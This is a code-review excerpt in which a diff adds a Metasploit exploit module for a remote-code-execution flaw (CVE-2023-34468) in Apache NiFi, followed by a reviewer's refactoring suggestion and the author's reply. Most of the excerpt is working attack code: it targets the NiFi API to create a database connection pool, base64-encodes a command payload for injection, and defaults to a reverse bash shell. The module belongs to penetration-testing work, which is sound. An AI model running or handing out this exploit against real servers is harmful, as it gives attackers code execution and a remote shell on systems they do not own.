modules/exploits/linux/http/apache_nifi_h2_rce.rb

```diff
@@ -0,0 +1,293 @@
+          'h00die', # msf module
+          'Matei "Mal" Badanoiu' # discovery
+        ],
+        'References' => [
+          ['CVE', '2023-34468'],
+          ['URL', 'https://lists.apache.org/thread/7b82l4f5blmpkfcynf3y6z4x1vqo59h8'],
+          ['URL', 'https://issues.apache.org/jira/browse/NIFI-11653'],
+          ['URL', 'https://nifi.apache.org/security.html#1.22.0'],
+          # not many h2 references on the Internet, especially for nifi, so leaving this here
+          # ['URL', 'https://gist.github.com/ijokarumawak/ed9085024eeeefbca19cfb2f20d23ed4#file-table_record_change_detection_example-xml-L65']
+          # ['URL', 'http://www.h2database.com/html/features.html']
+        ],
+        'DisclosureDate' => '2023-06-12',
+        'DefaultOptions' => { 'RPORT' => 8443 },
+        'Platform' => %w[unix],
+        'Arch' => [ARCH_CMD],
+        'Targets' => [
+          [
+            'Unix (In-Memory)',
+            {
+              'Type' => :unix_memory,
+              'Payload' => { 'BadChars' => '"' },
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }
+            }
+          ],
+        ],
+        'Privileged' => false,
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES]
+        }
+      )
+    )
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The base path', '/']),
+        OptInt.new('DELAY', [true, 'The delay (s) before stopping and deleting the processor', 15])
+      ],
+      self.class
+    )
+  end
+
+  def create_dbconnectionpool
+    @db_con_pool_name = Rex::Text.rand_text_alphanumeric(6..10)
+    body = {
+      'revision' =>
+          {
+            'clientId' => 'x',
+            'version' => 0
+          },
+      'disconnectedNodeAcknowledged' => false,
+      'component' => {
+        'type' => 'org.apache.nifi.dbcp.DBCPConnectionPool',
+        'bundle' => {
+          'group' => 'org.apache.nifi',
+          'artifact' => 'nifi-dbcp-service-nar',
+          'version' => @version.to_s
+        },
+        'name' => @db_con_pool_name
+      }
+    }
+    opts = {
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'nifi-api', 'process-groups', @process_group, 'controller-services'),
+      'ctype' => 'application/json',
+      'data' => body.to_json
+    }
+    opts['headers'] = { 'Authorization' => "Bearer #{@token}" } if @token
+    response = send_request_cgi(opts)
+    check_response("POSTing processor #{@processor} configuration", response, 201, 'id')
+  end
+
+  def configure_dbconpool
+    # our base64ed payload can't have = in it, so we'll pad out with spaces to remove them
+    b64_pe = ::Base64.strict_encode64(payload.encoded)
+    equals_count = b64_pe.count('=')
+    if equals_count > 0
+      b64_pe = ::Base64.strict_encode64(payload.encoded + ' ' * equals_count)
+    end
```

Comment:
nit: It might be worth throwing this into a mixin, since it's a pretty common case.

Reply:
The plan is once the 3 modules (h2, metabase, this) land to make an H2 mixin and pull out that functionality as well.  However, didn't want to make issues with certain PRs needing to land before others